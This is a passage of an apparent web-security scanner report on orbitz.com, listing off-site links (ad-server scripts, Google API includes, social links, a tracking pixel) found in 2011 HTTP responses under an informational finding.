http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Tue, 01 Feb 2011 15:22:34 GMT
Content-Length: 186898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
</style>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA"></script>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.353. http://www.orbitz.com/App/PrepareActivitiesHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareActivitiesHome

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PrepareActivitiesHome?z=2ebc&r=f

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=DAA865414B3F6E058AA17586FF6E5F54; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:27 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 43692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transition
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adscoop1">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&"></script>
...[SNIP]...
<div class="ad" id="adscoop2">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&"></script>
...[SNIP]...
<div class="ad" id="adscoop3">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&"></script>
...[SNIP]...
<div class="ad" id="adscoop4">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=scoop4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&adType=script&"></script>
...[SNIP]...
<div class="oasLowerLeftAd">
   <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div id="rightColumn">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&" height="225" width="519" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=activities&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=activities&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787856&dsrc=7&height=1&width=1&" height="1" 